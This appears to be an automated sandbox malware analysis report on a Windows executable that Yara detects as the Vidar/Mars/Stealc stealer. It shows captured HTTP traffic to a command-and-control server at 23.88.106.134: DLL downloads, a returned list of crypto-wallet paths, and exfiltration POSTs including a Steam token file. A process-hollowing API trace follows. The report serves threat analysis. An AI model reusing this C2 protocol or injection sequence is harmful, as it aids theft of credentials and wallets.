01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jun 8, 2024 20:22:05.717812061 CEST	92	OUT	GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:05.966444969 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:05 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jun 8, 2024 20:22:06.181651115 CEST	93	OUT	GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:06.430407047 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:06 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jun 8, 2024 20:22:06.662228107 CEST	89	OUT	GET /566d6e1ec8db6394/nss3.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:06.911427021 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:06 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jun 8, 2024 20:22:07.368176937 CEST	93	OUT	GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:07.682425976 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:07 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jun 8, 2024 20:22:07.729044914 CEST	97	OUT	GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:07.977200031 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:07 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jun 8, 2024 20:22:08.621871948 CEST	201	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID Host: 23.88.106.134 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Jun 8, 2024 20:22:08.939122915 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:08.993001938 CEST	467	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH Host: 23.88.106.134 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 2d 2d 0d 0a Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="message"wallets------IDBAKKECAEGCAKFIIIDH--
Jun 8, 2024 20:22:09.244756937 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Jun 8, 2024 20:22:09.248034954 CEST	465	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBG Host: 23.88.106.134 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"files------HDAFHIDGIJKJKECBGDBG--
Jun 8, 2024 20:22:09.499464035 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:09.515463114 CEST	563	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGI Host: 23.88.106.134 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Jun 8, 2024 20:22:09.768166065 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:09.847440004 CEST	202	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE Host: 23.88.106.134 Content-Length: 99115 Connection: Keep-Alive Cache-Control: no-cache
Jun 8, 2024 20:22:10.488284111 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:10.542860031 CEST	470	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIEC Host: 23.88.106.134 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="message"jbdtaijovg------BAAFBFBAAKECFIEBFIEC--
Jun 8, 2024 20:22:10.798376083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	0
Start time:	14:21:57
Start date:	08/06/2024
Path:	C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
Imagebase:	0x750000
File size:	474'624 bytes
MD5 hash:	9C2B900D014BA5B9DFD0CA6CEF201753
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:21:57
Start date:	08/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:21:57
Start date:	08/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x10000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.2%
Total number of Nodes:	183
Total number of Limit Nodes:	19

Executed Functions

Function 6CC22FB0 Relevance: 72.5, APIs: 17, Strings: 21, Instructions: 6037threadinjectionmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 6CC2508F
ShowWindow.USER32 ref: 6CC250A5
CreateProcessW.KERNELBASE ref: 6CC28410
VirtualAlloc.KERNELBASE ref: 6CC28470
Wow64GetThreadContext.KERNEL32 ref: 6CC28510
VirtualAllocEx.KERNELBASE ref: 6CC28619
VirtualAllocEx.KERNELBASE ref: 6CC2868E
WriteProcessMemory.KERNELBASE ref: 6CC286D7
WriteProcessMemory.KERNELBASE ref: 6CC28856
ReadProcessMemory.KERNEL32 ref: 6CC290DD
WriteProcessMemory.KERNEL32 ref: 6CC2916C
WriteProcessMemory.KERNELBASE ref: 6CC29346
Wow64SetThreadContext.KERNEL32 ref: 6CC29385
ResumeThread.KERNELBASE ref: 6CC29394
CloseHandle.KERNEL32 ref: 6CC293C1
CloseHandle.KERNEL32 ref: 6CC293D0
GetThreadContext.KERNEL32 ref: 6CC2999C

Strings

JrT, xrefs: 6CC266F4
EEW, xrefs: 6CC22FD0
50PR, xrefs: 6CC2814D
ie, xrefs: 6CC263BC
kernel32.dll, xrefs: 6CC250AB
KTC, xrefs: 6CC28DBC
nk^O, xrefs: 6CC28CD4
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CC28392
,`t, xrefs: 6CC28C53
6Ylf, xrefs: 6CC27AED
EEW, xrefs: 6CC264F0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CC28365
@, xrefs: 6CC28686
MR4d, xrefs: 6CC2639F
D, xrefs: 6CC29965
